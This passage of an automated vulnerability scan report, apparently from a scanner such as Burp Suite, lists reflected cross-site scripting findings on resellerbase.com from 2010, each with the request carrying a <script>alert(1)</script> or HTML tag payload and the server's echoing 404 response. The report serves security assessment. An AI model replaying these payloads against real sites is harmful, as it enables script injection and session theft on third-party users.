Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating990e9<script>alert(1)</script>2c59954aee8/4half.gif was not found on this server.</p>
...[SNIP]...

2.5425. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 53dd7<script>alert(1)</script>2a58cfd8b0e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/4half.gif53dd7<script>alert(1)</script>2a58cfd8b0e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/4half.gif53dd7<script>alert(1)</script>2a58cfd8b0e was not found on this server.</p>
...[SNIP]...

2.5426. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7fcef<script>alert(1)</script>3f1bcd76ec9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/4half.gif?7fcef<script>alert(1)</script>3f1bcd76ec9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/4half.gif?7fcef<script>alert(1)</script>3f1bcd76ec9=1 was not found on this server.</p>
...[SNIP]...

2.5427. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fcafd<script>alert(1)</script>6a3a5279fb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicefcafd<script>alert(1)</script>6a3a5279fb0/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicefcafd<script>alert(1)</script>6a3a5279fb0/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5428. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25f96<script>alert(1)</script>86dda80038b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes25f96<script>alert(1)</script>86dda80038b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes25f96<script>alert(1)</script>86dda80038b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5429. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d6043<script>alert(1)</script>c6e0955496d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmosd6043<script>alert(1)</script>c6e0955496d/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmosd6043<script>alert(1)</script>c6e0955496d/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5430. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 933cb<script>alert(1)</script>7581780b58c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images933cb<script>alert(1)</script>7581780b58c/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images933cb<script>alert(1)</script>7581780b58c/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5431. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 767a4<script>alert(1)</script>a03371fb785 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating767a4<script>alert(1)</script>a03371fb785/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating767a4<script>alert(1)</script>a03371fb785/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5432. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 58493<script>alert(1)</script>89378b86b78 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/search.php58493<script>alert(1)</script>89378b86b78?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/search.php58493<script>alert(1)</script>89378b86b78?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5433. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 80ef7<a>3b301bc4c1e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search80ef7<a>3b301bc4c1e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search80ef7<a>3b301bc4c1e&opt=2 was not found on this server.</p>
...[SNIP]...

2.5434. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 194fc<a>5c71b61e16f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/rating/search.php?keyword=search...194fc<a>5c71b61e16f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/search.php?keyword=search...194fc<a>5c71b61e16f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5435. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 92156<script>alert(1)</script>6268001594d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&92156<script>alert(1)</script>6268001594d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&92156<script>alert(1)</script>6268001594d=1 was not found on this server.</p>
...[SNIP]...

2.5436. http://www.resellerbase.com/web-service/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d5b75<a>47188a7998f was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d5b75<a>47188a7998f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d5b75<a>47188a7998f was not found on this server.</p>
...[SNIP]...

2.5437. http://www.resellerbase.com/web-service/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f08a9<script>alert(1)</script>11a6ad1a17b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicef08a9<script>alert(1)</script>11a6ad1a17b/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicef08a9<script>alert(1)</script>11a6ad1a17b/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5438. http://www.resellerbase.com/web-service/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b113e<script>alert(1)</script>9e31b040e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themesb113e<script>alert(1)</script>9e31b040e7/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themesb113e<script>alert(1)</script>9e31b040e7/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5439. http://www.resellerbase.com/web-service/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52557<script>alert(1)</script>60a1d2a4816 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos52557<script>alert(1)</script>60a1d2a4816/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos52557<script>alert(1)</script>60a1d2a4816/images/review/ was not found on this server.</p>
...[SNIP]...

2.5440. http://www.resellerbase.com/web-service/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b0639<script>alert(1)</script>af91116c166 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/imagesb0639<script>alert(1)</script>af91116c166/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/imagesb0639<script>alert(1)</script>af91116c166/review/ was not found on this server.</p>
...[SNIP]...

2.5441. http://www.resellerbase.com/web-service/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ac5d7<script>alert(1)</script>12d9ffb51f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/reviewac5d7<script>alert(1)</script>12d9ffb51f/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/reviewac5d7<script>alert(1)</script>12d9ffb51f/ was not found on this server.</p>
...[SNIP]...

2.5442. http://www.resellerbase.com/web-service/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e40a2<script>alert(1)</script>9f1ef26aeec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review/?e40a2<script>alert(1)</script>9f1ef26aeec=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/?e40a2<script>alert(1)</script>9f1ef26aeec=1 was not found on this server.</p>
...[SNIP]...

